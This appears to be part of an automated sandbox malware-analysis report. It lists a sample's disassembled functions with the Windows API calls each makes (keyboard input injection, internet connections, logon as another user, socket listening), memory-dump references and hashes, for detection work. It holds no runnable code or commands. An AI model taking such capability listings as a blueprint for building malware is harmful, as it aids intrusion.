                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F544EE
                                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F5450A
                                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00F5456A
                                                                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F545C8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 432972143-0
                                                                                                                                • Opcode ID: 8c08d6e8c87d0d5f944a1b2a8bb8874da1994b7494a17d5ed533c45997d34edc
                                                                                                                                • Instruction ID: 532553515a3df44b4a0f697bc62e7ff27b9f686180ebfae9ccc31300fe01f8ae
                                                                                                                                • Opcode Fuzzy Hash: 8c08d6e8c87d0d5f944a1b2a8bb8874da1994b7494a17d5ed533c45997d34edc
                                                                                                                                • Instruction Fuzzy Hash: 0F310872D042585FEF248B649C087FE7BA59B4932AF1C016AFA81521C1E774AA8CF761
                                                                                                                                Function 00F44DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F44DE8
                                                                                                                                • __isleadbyte_l.LIBCMT ref: 00F44E16
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F44E44
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F44E7A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                • Opcode ID: 845e16c6713875e79335303002eba223102763726f575efff58641b9e06cb172
                                                                                                                                • Instruction ID: c9c67fd754b04337f1cd16e4177139454b442a41d10c22749aa79c3f621be6d3
                                                                                                                                • Opcode Fuzzy Hash: 845e16c6713875e79335303002eba223102763726f575efff58641b9e06cb172
                                                                                                                                • Instruction Fuzzy Hash: EE31A131A00256AFEF219F75CC45BAA7FB5FF41320F154529EC21A71A1E730E851EB90
                                                                                                                                Function 00F77AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetForegroundWindow.USER32 ref: 00F77AB6
                                                                                                                                  • Part of subcall function 00F569C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F569E3
                                                                                                                                  • Part of subcall function 00F569C9: GetCurrentThreadId.KERNEL32 ref: 00F569EA
                                                                                                                                  • Part of subcall function 00F569C9: AttachThreadInput.USER32(00000000,?,00F58127), ref: 00F569F1
                                                                                                                                • GetCaretPos.USER32(?), ref: 00F77AC7
                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00F77B00
                                                                                                                                • GetForegroundWindow.USER32 ref: 00F77B06
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                • Opcode ID: c1162833391b3235e46f1c561ac12bb148b0020804ec305892418c2f4a184421
                                                                                                                                • Instruction ID: aa69486cd5565a3f423a5585d6397d4ecdbe530a87c1005213f3fcb2747dc6ed
                                                                                                                                • Opcode Fuzzy Hash: c1162833391b3235e46f1c561ac12bb148b0020804ec305892418c2f4a184421
                                                                                                                                • Instruction Fuzzy Hash: D7312172D00118AFDB00EFB9DC859EFBBFDEF58314B10806AE815E3211D6399E059BA1
                                                                                                                                Function 00F6497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F649B7
                                                                                                                                  • Part of subcall function 00F64A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F64A60
                                                                                                                                  • Part of subcall function 00F64A41: InternetCloseHandle.WININET(00000000), ref: 00F64AFD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1463438336-0
                                                                                                                                • Opcode ID: a901bd40894d8c78cc1da60371297d7a74039c01bba8ae321b4f7e0da3c07192
                                                                                                                                • Instruction ID: 2fbd297f56ac4bf7bb3abfe78cd66b1bf317370cea01e253ee4666559725cf8e
                                                                                                                                • Opcode Fuzzy Hash: a901bd40894d8c78cc1da60371297d7a74039c01bba8ae321b4f7e0da3c07192
                                                                                                                                • Instruction Fuzzy Hash: DB21A132640A05BFDB16AFA0CC00FBBBBA9FB48711F14401AFA0597650EB75A811B7A5
                                                                                                                                Function 00F4BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F4BCD9
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00F4BCE0
                                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00F4BCFA
                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F4BD29
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2621361867-0
                                                                                                                                • Opcode ID: 99d341bc3ea10ba0dba3c83912a8b239fff68a9edcc118b016bc817aec5c9d06
                                                                                                                                • Instruction ID: 09195f26d23394d6cdea80ff177e44937028fcd20e820bd29feb71072bf3e492
                                                                                                                                • Opcode Fuzzy Hash: 99d341bc3ea10ba0dba3c83912a8b239fff68a9edcc118b016bc817aec5c9d06
                                                                                                                                • Instruction Fuzzy Hash: F8215B7250020DABDF019FA8ED89BEE7FA9EF08314F144065FE01A6161C776CD61EB60
                                                                                                                                Function 00F78834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00F788A3
                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F788BD
                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F788CB
                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F788D9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                • Opcode ID: 7bece79a2a5a0e32a38ff903215094e37136d312187d5d794024abf7b9758fe0
                                                                                                                                • Instruction ID: efb8baa7fdb4837904dcc7ad70dcd2df592fb9d5e6678ddacc2ea96030c64b9c
                                                                                                                                • Opcode Fuzzy Hash: 7bece79a2a5a0e32a38ff903215094e37136d312187d5d794024abf7b9758fe0
                                                                                                                                • Instruction Fuzzy Hash: FF119331385114AFDB14AB28DC09FBA77A9FF85360F14811AF91AC72E1CB74AC41E792
                                                                                                                                Function 00F6900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00F6906D
                                                                                                                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00F6907F
                                                                                                                                • accept.WS2_32(00000000,00000000,00000000), ref: 00F6908C
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F690A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 385091864-0
                                                                                                                                • Opcode ID: c569df8e8a9e4ac78465146e5ceae12616b840b4e9414959abb6784a2330c833
                                                                                                                                • Instruction ID: a0affc152fe064db797b2fa10a9fef94a8137fcb4febe44b6de83f663286e75d
                                                                                                                                • Opcode Fuzzy Hash: c569df8e8a9e4ac78465146e5ceae12616b840b4e9414959abb6784a2330c833
                                                                                                                                • Instruction Fuzzy Hash: C321A132A00124AFCB10DF69DC85A9ABBFCEF49310F10816AF809D7290DA749A41DBA1
                                                                                                                                Function 00F518E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F52CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F518FD,?,?,?,00F526BC,00000000,000000EF,00000119,?,?), ref: 00F52CB9
                                                                                                                                  • Part of subcall function 00F52CAA: lstrcpyW.KERNEL32(00000000,?,?,00F518FD,?,?,?,00F526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00F52CDF
                                                                                                                                  • Part of subcall function 00F52CAA: lstrcmpiW.KERNEL32(00000000,?,00F518FD,?,?,?,00F526BC,00000000,000000EF,00000119,?,?), ref: 00F52D10
                                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00F51916
                                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00F526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00F5193C
                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00F51970
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                • String ID: cdecl
                                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                                • Opcode ID: a884b243422256b2b6686d5506d131abfa21d42f0345014fbaf4e624f3f209f1
                                                                                                                                • Instruction ID: 6a96a7d5ab36447a3c9f6116efd028ceda3598ebaba8f49944f4accb97c023a8
                                                                                                                                • Opcode Fuzzy Hash: a884b243422256b2b6686d5506d131abfa21d42f0345014fbaf4e624f3f209f1
                                                                                                                                • Instruction Fuzzy Hash: 1411D036100305AFDB15AF34DC59E7A77B8FF45360B40802AFA06CB260EB31A845A7A1
                                                                                                                                Function 00F513D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F513EE
                                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F51409
                                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F5141F
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00F51474
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3137044355-0
                                                                                                                                • Opcode ID: 2f48d8c8cab5d24b0a148e5c755cf62049cb79a01f295f69e235cfadf9900572
                                                                                                                                • Instruction ID: 91eb3686a607851f980689de8152755667a9e23d5eaaa9e5fd90d1bb90417d9f
                                                                                                                                • Opcode Fuzzy Hash: 2f48d8c8cab5d24b0a148e5c755cf62049cb79a01f295f69e235cfadf9900572
                                                                                                                                • Instruction Fuzzy Hash: 5B217F71900209EBDB20DF91DC88BDABBB8FF01746F10896AAA1297150D774FA48EF51
                                                                                                                                Function 00F4C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4C285
                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4C297
                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4C2AD
                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4C2C8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: e35f2214bf5689e50e4ce33e795b2a88cb0d6ded5ba9833462e0bc5f9915d997
                                                                                                                                • Instruction ID: acd3c01b58761560c5220cfb333bb0ad0329ee47b22ce8f009c0ff18e874db0c
                                                                                                                                • Opcode Fuzzy Hash: e35f2214bf5689e50e4ce33e795b2a88cb0d6ded5ba9833462e0bc5f9915d997
                                                                                                                                • Instruction Fuzzy Hash: 5711187A941218FFDB11DFD8CC85E9DBBB4FB08710F204091EA04B7294D6B1AE10EBA4
                                                                                                                                Function 00F57C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F57C6C
                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00F57C9F
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F57CB5
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F57CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                • Opcode ID: 3371dcfe1953c9d803b307d88182d69f0119a4517330c5e257e9358d88797eec
                                                                                                                                • Instruction ID: cc295c2e06effb69652ab26a8a5134d29559ca0cbad778e62a29a7d4be9cc88d
                                                                                                                                • Opcode Fuzzy Hash: 3371dcfe1953c9d803b307d88182d69f0119a4517330c5e257e9358d88797eec
                                                                                                                                • Instruction Fuzzy Hash: D8112B72B0934CBFD701DF7CEC08A9A7FAE9B05325F144216FA25D3291D6748D48A761
                                                                                                                                Function 00F2C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F2C657
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00F2C66B
                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2C675
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3970641297-0
                                                                                                                                • Opcode ID: ec8d92f9cdcc57192d076d56d681ff08f8a051350c7457d5986b7150d515c2d8
                                                                                                                                • Instruction ID: 391e2a1cea018cb4a064c8ab2daec89743c8f4a9165d1d1984a1659b17aabdce
                                                                                                                                • Opcode Fuzzy Hash: ec8d92f9cdcc57192d076d56d681ff08f8a051350c7457d5986b7150d515c2d8
                                                                                                                                • Instruction Fuzzy Hash: 5B115E7250155DBFDB114FA49C54EEA7F69EF09364F154216FA0852110C732DC60BBA1
                                                                                                                                Function 00F549D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F5354D,?,00F545D5,?,00008000), ref: 00F549EE
                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F5354D,?,00F545D5,?,00008000), ref: 00F54A13
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F5354D,?,00F545D5,?,00008000), ref: 00F54A1D
                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,00F5354D,?,00F545D5,?,00008000), ref: 00F54A50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
